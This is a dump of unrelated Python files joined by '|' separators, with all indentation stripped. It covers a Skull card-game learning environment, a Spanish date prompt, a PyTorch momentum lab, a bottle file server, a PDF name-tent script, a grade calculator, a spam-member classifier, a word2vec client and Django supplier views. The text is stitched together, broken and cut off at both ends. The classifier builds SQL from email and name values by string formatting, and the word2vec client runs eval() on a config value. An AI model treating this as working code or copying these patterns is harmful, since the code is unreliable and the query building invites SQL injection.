while bet == 0 :
for player in self.order_players():
choice = self.get_choice(player, bet, bet_holder, in_game_players)
if player in in_game_players:
if choice.type == 'CARD' and player.has_cards():
if choice.value == 1 and player.nbr_flowers() > 0:
player.play_flower()
elif choice.value == 0 and player.has_skull():
player.play_skull()
else:
bet = 1
bet_holder = player
elif choice.value > 0:
bet = choice.value
bet_holder = player
break
else:
bet = 1
bet_holder = player
break
return bet, bet_holder, in_game_players
def bet_stage(self, bet, bet_holder, in_game_players):
nbr_cards = self.nbr_cards()
restart_index = self.order.index(bet_holder)
while len(in_game_players) > 1:
for player in self.order_players(previous_player = restart_index):
choice = self.get_choice(player, bet, bet_holder, in_game_players)
if player in in_game_players:
if choice.type == 'BET' and nbr_cards >= choice.value > bet:
bet = choice.value
bet_holder = player
if choice.value == nbr_cards: in_game_players = [player]
break
else:
in_game_players.remove(player)
if len(in_game_players) <=1: break
return bet, bet_holder, in_game_players
def show_self_stage(self,bet,bet_holder,in_game_players):
shown_cards = 0
player = bet_holder
while bet_holder.has_hidden_cards() and shown_cards <bet:
card = bet_holder.show()
if card != 1:
player.skulled()
if not player.has_cards():
self.kill(player)
in_game_players = []
break
else:
shown_cards += 1
return shown_cards, in_game_players
def show_stage(self, bet, bet_holder, in_game_players,shown_cards):
restart_index = self.order.index(bet_holder)
while shown_cards < bet and len(in_game_players)>0:
if shown_cards >= bet: break
if bet_holder not in in_game_players: break
for player in self.order_players(previous_player = restart_index):
choice = self.get_choice(player, bet, bet_holder, in_game_players)
if player == bet_holder:
if choice.type == 'SHOW':
card = self.order[player.relative_order[choice.value-1]].show()
if card != 1:
player.skulled()
if not player.has_cards():
self.kill(player)
in_game_players = []
break
else:
shown_cards += 1
else:
player.skulled()
if not player.has_cards():
self.kill(player)
in_game_players = []
break
return shown_cards
def step(self, iters, forward, reward):
self.forward = forward
self.reward = reward
results = []
for iter in range(iters):
self.reset_players()
rnd = 1
self.alive_players = [player for player in self.players]
winner = 0
order = self.order_players(start=1)
while winner == 0:
bet, bet_holder, in_game_players = self.card_stage()
bet, bet_holder, in_game_players = self.bet_stage(bet, bet_holder, in_game_players)
shown_cards, in_game_players = self.show_self_stage(bet, bet_holder, in_game_players)
shown_cards = self.show_stage(bet, bet_holder, in_game_players,shown_cards)
if shown_cards >= bet:
bet_holder.points += 1
if bet_holder.points == 2:
winner = bet_holder
if len(self.alive_players) <= 1:
break
self.clear_players()
if winner:
winner.win(self.reward)
for player in self.players:
if player != winner:
player.lose(self.reward)
result = [0,0,0,0]
result[self.players.index(winner)] = 1
results.append(result)
else:
for player in self.players:
player.lose(self.reward)
results.append([0,0,0,0])
return results
def get_legal_moves(self,player, state, in_game_players):
if player in in_game_players:
indexes = list(range(22))
if state['BET_HOLDER'] == 0:
indexes = indexes[19:]
x = 0
for v in state['HAS_HIDDEN']:
if not v:
indexes.remove(indexes[x])
x-=1
x+=1
else:
indexes = indexes[:state['NBR_CARDS']+2]
if state['BET'] != 0 or not True in [ x >0 for x in [state['FLOWERS'], state['SKULL']]]:
for index in indexes[:state['BET']+3]: indexes.remove(index)
indexes.append(18)
else :
indexes = indexes[:19]
x = 0
while x < len(state['HAS_HIDDEN']):
if not state['HAS_HIDDEN'][x] and state['ALIVE'][x]:
indexes = indexes[:2]
break
x+=1
if 0 in state['OWN_FRONT']:
indexes = indexes[:2]
if state['FLOWERS'] < 1:
indexes.remove(indexes[1])
elif state['SKULL'] == 0:
indexes.remove(indexes[0])
else:
indexes = [18]
response = [0 for x in range(22)]
for i in indexes : response[i] = 1
return response
class Env_Process(Process):
def __init__(self, conn, models):
Process.__init__(self, target = Env_Process.step, args =(conn,
models))
self.start()
def step(conn, models):
model_names = list(models.keys())
env = Env(model_names)
parent_conn, child_conn = Pipe()
def forward(state,agent_name, forward_pass = 1):
models[agent_name].send([1,[state, forward_pass], child_conn])
if forward_pass:
probas = parent_conn.recv()
return probas
def reward(amount, action, agent_name):
models[agent_name].send([2, [amount, action]])
results = env.step(25, forward, reward)
conn.send([3,[results, model_names]])
|
def fecha():
repetir=True
rmes=True
while(repetir==True):
d= input("Introduzca el dia: ")
repetir= ((d<1) or (d>31))
if(repetir==True):
print("ERROR: Dia incorrecto. ")
while(rmes==True):
m= input("Introduzca el mes: ")
rmes= ((m<1) or (m>12))
if(rmes==True):
print("ERROR: Mes incorrecto. ")
a= input("Introduzca un aลo: ")
if m==1:
m= "Enero"
if m==2:
m= "Febrero"
if m==3:
m= "Marzo"
if m==4:
m= "Abril"
if m==5:
m= "Mayo"
if m==6:
m= "Junio"
if m==7:
m= "Julio"
if m==8:
m= "Agosto"
if m==9:
m= "Septiembre"
if m==10:
m= "Octubre"
if m==11:
m= "Noviembre"
if m==12:
m= "Diciembre"
print d, m, a
fecha()
|
#Momentum
#Preparation-----------------------------------------------------------
# These are the libraries that will be used for this lab.
import torch
import torch.nn as nn
import matplotlib.pylab as plt
import numpy as np
torch.manual_seed(0)
#This function will plot a cubic function and the parameter values obtained via Gradient Descent.
# Plot the cubic
def plot_cubic(w, optimizer):
LOSS = []
# parameter values
W = torch.arange(-4, 4, 0.1)
# plot the loss fuction
for w.state_dict()['linear.weight'][0] in W:
LOSS.append(cubic(w(torch.tensor([[1.0]]))).item())
w.state_dict()['linear.weight'][0] = 4.0
n_epochs = 10
parameter = []
loss_list = []
# n_epochs
# Use PyTorch custom module to implement a ploynomial function
for n in range(n_epochs):
optimizer.zero_grad()
loss = cubic(w(torch.tensor([[1.0]])))
loss_list.append(loss)
parameter.append(w.state_dict()['linear.weight'][0].detach().data.item())
loss.backward()
optimizer.step()
plt.plot(parameter, loss_list, 'ro', label='parameter values')
plt.plot(W.numpy(), LOSS, label='objective function')
plt.xlabel('w')
plt.ylabel('l(w)')
plt.legend()
#This function will plot a 4th order function and the parameter values obtained via Gradient Descent.
#You can also add Gaussian noise with a standard deviation determined by the parameter std.
# Plot the fourth order function and the parameter values
def plot_fourth_order(w, optimizer, std=0, color='r', paramlabel='parameter values', objfun=True):
W = torch.arange(-4, 6, 0.1)
LOSS = []
for w.state_dict()['linear.weight'][0] in W:
LOSS.append(fourth_order(w(torch.tensor([[1.0]]))).item())
w.state_dict()['linear.weight'][0] = 6
n_epochs = 100
parameter = []
loss_list = []
#n_epochs
for n in range(n_epochs):
optimizer.zero_grad()
loss = fourth_order(w(torch.tensor([[1.0]]))) + std * torch.randn(1, 1)
loss_list.append(loss)
parameter.append(w.state_dict()['linear.weight'][0].detach().data.item())
loss.backward()
optimizer.step()
# Plotting
if objfun:
plt.plot(W.numpy(), LOSS, label='objective function')
plt.plot(parameter, loss_list, 'ro',label=paramlabel, color=color)
plt.xlabel('w')
plt.ylabel('l(w)')
plt.legend()
#This is a custom module. It will behave like a single parameter value. We do it this way so we can use PyTorch's build-in optimizers .
# Create a linear model
class one_param(nn.Module):
# Constructor
def __init__(self, input_size, output_size):
super(one_param, self).__init__()
self.linear = nn.Linear(input_size, output_size, bias=False)
# Prediction
def forward(self, x):
yhat = self.linear(x)
return yhat
#We create an object w, when we call the object with an input of one, it will behave like an individual parameter value. i.e w(1) is analogous to $w$
# Create a one_param object
w = one_param(1, 1)
#Saddle Points--------------------------------------------------------------------------
#Let's create a cubic function with Saddle points
# Define a function to output a cubic
def cubic(yhat):
out = yhat ** 3
return out
#We create an optimizer with no momentum term
# Create a optimizer without momentum
optimizer = torch.optim.SGD(w.parameters(), lr=0.01, momentum=0)
#We run several iterations of stochastic gradient descent and plot the results. We see the parameter values get stuck in the saddle point.
# Plot the model
plot_cubic(w, optimizer)
#we create an optimizer with momentum term of 0.9
# Create a optimizer with momentum
optimizer = torch.optim.SGD(w.parameters(), lr=0.01, momentum=0.90)
#We run several iterations of stochastic gradient descent with momentum and plot the results. We see the parameter values do not get stuck in the saddle point.
# Plot the model
plot_cubic(w, optimizer)
#Local Minima---------------------------------------------------------------------------------
#In this section, we will create a fourth order polynomial with a local minimum at 4 and a global minimum a -2.
#We will then see how the momentum parameter affects convergence to a global minimum. The fourth order polynomial is given by:
# Create a function to calculate the fourth order polynomial
def fourth_order(yhat):
out = torch.mean(2 * (yhat ** 4) - 9 * (yhat ** 3) - 21 * (yhat ** 2) + 88 * yhat + 48)
return out
#We create an optimizer with no momentum term. We run several iterations of stochastic gradient descent and plot the results.
#We see the parameter values get stuck in the local minimum.
# Make the prediction without momentum
optimizer = torch.optim.SGD(w.parameters(), lr=0.001)
plot_fourth_order(w, optimizer)
#We create an optimizer with a momentum term of 0.9. We run several iterations of stochastic gradient descent and plot the results.
#We see the parameter values reach a global minimum.
# Make the prediction with momentum
optimizer = torch.optim.SGD(w.parameters(), lr=0.001, momentum=0.9)
plot_fourth_order(w, optimizer)
#Noise-------------------------------------------------------------------------------------
#In this section, we will create a fourth order polynomial with a local minimum at 4 and a global minimum a -2,
#but we will add noise to the function when the Gradient is calculated. We will then see how the momentum parameter affects convergence to a global minimum.
#with no momentum, we get stuck in a local minimum
# Make the prediction without momentum when there is noise
optimizer = torch.optim.SGD(w.parameters(), lr=0.001)
plot_fourth_order(w, optimizer, std=10)
#with momentum, we get to the global minimum
# Make the prediction with momentum when there is noise
optimizer = torch.optim.SGD(w.parameters(), lr=0.001,momentum=0.9)
plot_fourth_order(w, optimizer, std=10)
#Practice--------------------------------------------------------------------------------
#Create two SGD objects with a learning rate of 0.001. Use the default momentum parameter value for one and a value of 0.9 for the second.
#Use the function plot_fourth_order with an std=100, to plot the different steps of each. Make sure you run the function on two independent cells.
## Practice: Create two SGD optimizer with lr = 0.001, and one without momentum and the other with momentum = 0.9. Plot the result out.
optimizer1 = torch.optim.SGD(w.parameters(), lr = 0.001)
plot_fourth_order(w, optimizer1, std = 100, color = 'black', paramlabel = 'parameter values with optimizer 1')
optimizer2 = torch.optim.SGD(w.parameters(), lr = 0.001, momentum = 0.9)
plot_fourth_order(w, optimizer2, std = 100, color = 'red', paramlabel = 'parameter values with optimizer 2', objfun = False) |
"""
Set up website, point to index.html and supporting files.
Think MVC not directories...
Orig path: '/LOC/Falcon/Falcon/static'
"""
import bottle as web
import os
# Memory Game
@web.route('/')
@web.route('/<name>')
@web.view('mem_game')
def index(name='Memorizer'):
#path = os.path.dirname(os.path.realpath(__file__)) + r'\app'
#print('path: ' + path)
return dict(name=name)
# Resource files
@web.route('/resource/<filename>')
def index(filename):
res_path = os.path.dirname(os.path.realpath(__file__)) + r'\resource'
#print('res_path: ' + res_path)
return web.static_file(filename, root=res_path)
# Application files
@web.route('/app/<filename>')
def index(filename):
app_path = os.path.dirname(os.path.realpath(__file__)) + r'\app'
#print('app_path: ' + app_path)
return web.static_file(filename, root=app_path)
# Data files
@web.route('/data/<filename>')
def index(filename):
data_path = os.path.dirname(os.path.realpath(__file__)) + r'\data'
#print('data_path: ' + data_path)
return web.static_file(filename, root=data_path)
web.run(host='localhost', port=8080, debug=True)
|
#!/usr/bin/env python3
import sys
import render_pdf
import render_mini_pdf
import pandas as pd
import numpy as np
def get_name_talents(series):
name = series['Name']
talents = (series['S1'], series['S2'], series['S3'], series['S4'], series['S5'])
return (name, talents)
def main(xlfname, output_dir, imgfname=None, mini=False):
if mini:
renderer = render_mini_pdf
else:
renderer = render_pdf
# start with "vRO US and Canada June 2020 Master Roster.xlsx" format
df = pd.read_excel(xlfname, sheet_name="Roster")
name_tent = renderer.MultiPageNameTent('{:s}/output.pdf'.format(output_dir))
spares = []
if len(df) % 2 == 1:
# odd
spares.append(get_name_talents(df.iloc[len(df)-1]))
end = len(df) - 1
else:
end = len(df)
for row_idx in range(0, end, 2):
top_name, top_talents = get_name_talents(df.iloc[row_idx])
bottom_name, bottom_talents = get_name_talents(df.iloc[row_idx + 1])
if np.nan in top_talents:
print('Skipping {}: no Strengths'.format(top_name))
if not np.nan in bottom_talents:
spares.append((bottom_name, bottom_talents))
else:
print('Skipping {}: no Strengths'.format(bottom_name))
continue
if np.nan in bottom_talents:
print('Skipping {}: no Strengths'.format(bottom_name))
spares.append((top_name, top_talents))
continue
name_tent.create_page(top_name, top_talents, bottom_name, bottom_talents, imgfname)
#TODO: go through the spares and print them
if len(spares) % 2 == 1:
# odd
end = len(spares) - 1
odd = True
else:
end = len(spares)
odd = False
for row_idx in range(0, end, 2):
top_name, top_talents = spares[row_idx]
bottom_name, bottom_talents = spares[row_idx+1]
name_tent.create_page(top_name, top_talents, bottom_name, bottom_talents, imgfname)
if odd:
top_name, top_talents = spares[-1]
renderer.create_page(top_name, top_talents, None, None, imgfname)
name_tent.done()
if __name__ == '__main__':
if len(sys.argv) < 4:
print('Usage: {} <xlfname> <output_dir> <imgfname>'.format(sys.argv[0]))
raise SystemExit()
main(sys.argv[1], sys.argv[2], sys.argv[3], mini=True)
|
import Tugas21m
import matplotlib.pyplot as plt
import numpy as np
Berat = [0.3,0.3,0.25,0.15]
juge = []
data = [["Riky",80,76,80,80],["david",45,80,80,80],["isac",45,80,65,80],["rio",80,80,70,80],["maven",80,77,80,96],["devi",75,80,80,92],["Anggel",78,79,79,79],["Steven",69,72,68,48]]
print ("No.\t|Nama Mhs\t|N.Tgs\t|N.Kuis\t|N.UTS\t|N.UAS\t|NilaiAkhir\t|NilaiHuruf")
print("-------------------------------------------------------------------")
for i in range(len(data)) :
nilaiAkhir = (data[i][1]*Berat[0])+(data[i][2]*Berat[1])+(data[i][3]*Berat[2])+(data[i][4]*Berat[3])
juge.append(Tugas21m.ukurNilai(nilaiAkhir))
print(str(i) + ".\t|" +str(data [i][0])+ "\t\t|" + str(data [i][1]) +"\t|" + str(data [i][2]) +"\t|" + str(data [i][3]) +"\t|" + str(data [i][4]) +"\t|" + str(int(nilaiAkhir))+"\t\t|" + str(juge[i]))
y = np.array(juge)
print (y)
plt.hist(y)
plt.show()
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
#
# Copyright (c) 2017 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pickle
import MySQLdb
from dbutils import DBConfig
import pandas.io.sql as sql
import numpy as np
import sys
SELECT_QUERY = ("SELECT ID, Email, FirstName, Surname FROM Member WHERE Type = 'None';")
UPDATE_MEMBER = ("UPDATE Member SET Type = '%s', Active = %s WHERE ID = %s ;")
SELECT_EXISTS = ("SELECT * FROM MemberEstimatorFeed WHERE Email='%s' AND FirstName ='%s' AND Surname ='%s'")
INSERT_MEMBER_TRAINING_DATA = ("INSERT INTO MemberEstimatorFeed (Email, FirstName, Surname, Type) VALUES('%s', '%s', '%s', '%s');")
root_dir = sys.argv[1] # param
cursor = None
config = DBConfig(root_dir+"/db.ini").read_db_config()
try:
# Open database connection
db = MySQLdb.connect(**config)
# prepare a cursor object using cursor() method
cursor = db.cursor()
df = sql.read_sql(SELECT_QUERY, db)
X_test = df.replace(np.nan, '', regex=True)
if not X_test.empty:
print("Member classification process excerpt :")
print("")
print("")
classifier = pickle.load(open('member_classifier.pickle', 'rb'))
predicted = classifier.predict(X_test.drop(['ID'], axis = 1 ))
for item, type in zip(X_test.to_dict( orient = 'records'), predicted):
cursor.execute(UPDATE_MEMBER % (type, 1 if type == 'Ham' else 0, item['ID']))
if type == 'Spam':
print("[SPAM] - marking member (%s,%s,%s,%s) as spammer and deactivating it.") % (item['Email'].encode('utf-8'), item['FirstName'].encode('utf-8'), item['Surname'].encode('utf-8'), item['ID'])
cursor.execute(SELECT_EXISTS % (item['Email'],item['FirstName'],item['Surname']))
exists = cursor.fetchone();
if exists is None:
cursor.execute(INSERT_MEMBER_TRAINING_DATA % (item['Email'], item['FirstName'], item['Surname'], type))
else:
print("[HAM] - marking member (%s,%s,%s,%s) as nom spammer.") % (item['Email'].encode('utf-8'), item['FirstName'].encode('utf-8'), item['Surname'].encode('utf-8'), item['ID'])
else:
print("nothing to process ... ")
db.commit()
except Exception as e:
print e
# Rollback in case there is any error
db.rollback()
raise
finally:
if not (cursor is None):
cursor.close()
# disconnect from server
if not (db is None):
db.close() |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Author: zhangfang
# @Date: 2016-04-17 22:26:22
# @Email: thuzhf@gmail.com
# @Last Modified by: thuzhf
# @Last Modified time: 2016-04-18 00:44:28
from __future__ import print_function,division,unicode_literals,absolute_import
import sys,os,re,json,gzip,math,time,datetime,functools,itertools,random
import multiprocessing as mp
if sys.version_info < (3,): # version 2.x
range2 = range
range = xrange
import ConfigParser as configparser
import cPickle as pickle
else:
import configparser
import pickle
import requests
from gensim.models import Word2Vec
from history_analysis.utils.logger import simple_logger
logger = simple_logger(__name__, 'history_analysis/log/')
config = configparser.ConfigParser()
config_file = 'history_analysis/config/word2vec.cfg'
config.read(config_file)
section = config['service']
URL_PREFIX = eval(section['url_prefix'])
class Word2vecModel(object):
"""docstring for InstantWord2vec"""
def __init__(self, model_file):
logger.info('loading model: {}'.format(model_file))
self.model = Word2Vec.load(model_file)
logger.info('model loaded.')
def filter_words(self, words):
return [word for word in words if word in self.model.vocab]
def get_similarity_between(self, w1, w2):
w1 = self.filter_words(w1)
w2 = self.filter_words(w2)
if w1 and w2:
ans = self.model.similarity(w1, w2)
else:
ans = None
return ans
def get_n_similarity_between(self, ws1, ws2):
ws1 = self.filter_words(ws1)
ws2 = self.filter_words(ws2)
if ws1 and ws2:
ans = self.model.n_similarity(ws1, ws2)
else:
ans = None
return ans
def most_similar(self, positive, negative=[], topn=10):
positive = self.filter_words(positive)
negative = self.filter_words(negative)
if positive or negative:
ans = self.model.most_similar_cosmul(positive=positive, negative=negative, topn=topn)
else:
ans = None
return ans
def get_similarity_between(mid1, mid2, url_prefix=URL_PREFIX):
url = '{:s}/similarity'.format(url_prefix)
params = {'w1': mid1, 'w2': mid2}
r = requests.get(url, params).json()
return r
def get_n_similarity_between(mid1, mid2, url_prefix=URL_PREFIX):
url = '{:s}/n_similarity'.format(url_prefix)
params = {'ws1': mid1, 'ws2': mid2}
r = requests.get(url, params).json()
return r
def main():
n1 = 'data_mining'
n2 = 'machine_learning'
print(get_similarity_between(n1, n2))
if __name__ == '__main__':
start_t = time.time()
main()
end_t = time.time()
t = end_t - start_t
print('Time elapsed: {:.4f} minutes'.format(t / 60.)) |
from django.shortcuts import render, redirect
from django.http import JsonResponse, HttpResponse
from .models import (RfqSupplierHeader,RfqSupplierDetail,
QuotationHeaderSupplier, QuotationDetailSupplier,
PoHeaderSupplier, PoDetailSupplier,
DcHeaderSupplier, DcDetailSupplier,
Company_info)
from customer.models import (DcHeaderCustomer, PoHeaderCustomer, QuotationHeaderCustomer, RfqCustomerHeader)
from inventory.models import Add_products
from transaction.models import ChartOfAccount,PurchaseDetail
from django.core import serializers
from django.forms.models import model_to_dict
import json
import datetime
from django.db import IntegrityError
from django.conf import settings
from django.views.generic import View
from .utils import render_to_pdf
from django.template.loader import get_template
from django.db import connection
from django.db.models import Q
import xlwt
from django.contrib.auth.decorators import user_passes_test, login_required
from django.contrib.auth.models import User
from user.models import UserRoles
from django.contrib import messages
from django.contrib.gis.geoip2 import GeoIP2
def customer_roles(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 1)
form_name = Q(form_name = "Customer")
allow_quotation_roles = UserRoles.objects.filter(user_id,form_id, form_name).all()
return allow_quotation_roles
def supplier_roles(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
form_name = Q(form_name = "Supplier")
allow_po_roles = UserRoles.objects.filter(user_id, form_id, form_name).all()
return allow_po_roles
def transaction_roles(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 3)
form_name = Q(form_name = "Transaction")
allow_po_roles = UserRoles.objects.filter(user_id, form_id, form_name).all()
return allow_po_roles
def inventory_roles(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 4)
form_name = Q(form_name = "Inventory")
allow_po_roles = UserRoles.objects.filter(user_id, form_id, form_name).all()
return allow_po_roles
def report_roles(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 5)
form_name = Q(form_name = "Reports")
allow_quotation_roles = UserRoles.objects.filter(user_id,form_id, form_name).all()
return allow_quotation_roles
def allow_rfq_display(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 21)
display = Q(display = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, display)
if allow_role:
return True
else:
return False
def allow_rfq_add(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 21)
add = Q(add = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, add)
if allow_role:
return True
else:
return False
def allow_rfq_edit(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 21)
edit = Q(edit = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, edit)
if allow_role:
return True
else:
return False
def allow_rfq_delete(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 21)
delete = Q(delete = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, delete)
if allow_role:
return True
else:
return False
def allow_quotation_display(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 22)
display = Q(display = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, display)
if allow_role:
return True
else:
return False
def allow_quotation_add(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 22)
add = Q(add = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, add)
if allow_role:
return True
else:
return False
def allow_quotation_edit(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 22)
edit = Q(edit = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, edit)
if allow_role:
return True
else:
return False
def allow_quotation_delete(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 22)
delete = Q(delete = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, delete)
if allow_role:
return True
else:
return False
def allow_quotation_print(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 22)
r_print = Q(r_print = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, r_print)
if allow_role:
return True
else:
return False
def allow_purchase_order_display(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 23)
display = Q(display = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, display)
if allow_role:
return True
else:
return False
def allow_purchase_order_add(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 23)
add = Q(add = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, add)
if allow_role:
return True
else:
return False
def allow_purchase_order_edit(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 23)
edit = Q(edit = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, edit)
if allow_role:
return True
else:
return False
def allow_purchase_order_delete(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 23)
delete = Q(delete = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, delete)
if allow_role:
return True
else:
return False
def allow_purchase_order_print(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 23)
r_print = Q(r_print = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, r_print)
if allow_role:
return True
else:
return False
def allow_delivery_challan_display(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 24)
display = Q(display = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, display)
if allow_role:
return True
else:
return False
def allow_delivery_challan_add(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 24)
add = Q(add = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, add)
if allow_role:
return True
else:
return False
def allow_delivery_challan_edit(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 24)
edit = Q(edit = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, edit)
if allow_role:
return True
else:
return False
def allow_delivery_challan_delete(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 24)
delete = Q(delete = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, delete)
if allow_role:
return True
else:
return False
def allow_delivery_challan_print(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 24)
r_print = Q(r_print = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, r_print)
if allow_role:
return True
else:
return False
def allow_mrn_display(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 25)
display = Q(display = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, display)
if allow_role:
return True
else:
return False
def allow_mrn_edit(user):
user_id = Q(user_id = user.id)
form_id = Q(form_id = 2)
child_form = Q(child_form = 25)
edit = Q(edit = 1)
allow_role = UserRoles.objects.filter(user_id, form_id, child_form, edit)
if allow_role:
return True
else:
return False
def rfq_roles(user):
userid = str(user.id)
user_id = Q(user_id= userid)
child_form = Q(child_form= 21)
rfq_roles = UserRoles.objects.filter(user_id,child_form).first()
return rfq_roles
def quotation_roles2(user):
userid = str(user.id)
user_id = Q(user_id= userid)
child_form = Q(child_form= 22)
quotation_roles = UserRoles.objects.filter(user_id,child_form).first()
return quotation_roles
def purchase_order_roles(user):
userid = str(user.id)
user_id = Q(user_id= userid)
child_form = Q(child_form= 23)
po_roles = UserRoles.objects.filter(user_id,child_form).first()
return po_roles
def delivery_challan_roles(user):
userid = str(user.id)
user_id = Q(user_id= userid)
child_form = Q(child_form= 24)
dc_roles = UserRoles.objects.filter(user_id,child_form).first()
return dc_roles
def mrn_roles(user):
userid = str(user.id)
user_id = Q(user_id= userid)
child_form = Q(child_form= 25)
mrn_roles = UserRoles.objects.filter(user_id,child_form).first()
return mrn_roles
def get_client_ip(request):
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for:
ip = x_forwarded_for.split(',')[0]
else:
ip = request.META.get('REMOTE_ADDR')
return ip
@login_required
def home(request):
# ips = get_client_ip(request)
# g = GeoIP2()
# try:
# print(g.city('45.76.117.228'))
# except Exception as e:
# print(e)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
print(allow_customer_roles)
today = datetime.date.today()
cursor = connection.cursor()
cursor.execute('''select rfq_no , date, account_id_id
from customer_rfqcustomerheader
where customer_rfqcustomerheader.show_notification = 1 and customer_rfqcustomerheader.follow_up = %s
union
select quotation_no, date, account_id_id
from customer_quotationheadercustomer
where customer_quotationheadercustomer.show_notification = 1 and customer_quotationheadercustomer.follow_up = %s
union
select po_no, date, account_id_id
from customer_poheadercustomer
where customer_poheadercustomer.show_notification = 1 and customer_poheadercustomer.follow_up = %s
union
select dc_no, date, account_id_id
from customer_dcheadercustomer
where customer_dcheadercustomer.show_notification = 1 and customer_dcheadercustomer.follow_up = %s
''',[today,today,today,today])
customer_row = cursor.fetchall()
total_notification = len(customer_row)
supplier_row = cursor.execute('''select rfq_no , date, account_id_id
from supplier_rfqsupplierheader
where supplier_rfqsupplierheader.show_notification = 1 and supplier_rfqsupplierheader.follow_up = %s
union
select quotation_no, date, account_id_id
from supplier_quotationheadersupplier
where supplier_quotationheadersupplier.show_notification = 1 and supplier_quotationheadersupplier.follow_up = %s
union
select po_no, date, account_id_id
from supplier_poheadersupplier
where supplier_poheadersupplier.show_notification = 1 and supplier_poheadersupplier.follow_up = %s
union
select dc_no, date, account_id_id
from supplier_dcheadersupplier
where supplier_dcheadersupplier.show_notification = 1 and supplier_dcheadersupplier.follow_up = %s
''',[today,today,today,today])
supplier_row = supplier_row.fetchall()
total_notification_supplier = len(supplier_row)
return render(request,'supplier/base.html',{'total_notification':total_notification,'total_notification_supplier':total_notification_supplier ,'customer_row':customer_row, 'supplier_row':supplier_row, 'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles,
'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_rfq_display)
def rfq_supplier(request):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
permission = rfq_roles(request.user)
all_rfq = RfqSupplierHeader.objects.all()
return render(request, 'supplier/rfq_supplier.html',{'all_rfq':all_rfq, 'permission':permission,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles,'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_rfq_add)
def new_rfq_supplier(request):
company = request.session['company']
company = Company_info.objects.get(id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
get_last_rfq_no = RfqSupplierHeader.objects.last()
all_item_code = Add_products.objects.all()
if get_last_rfq_no:
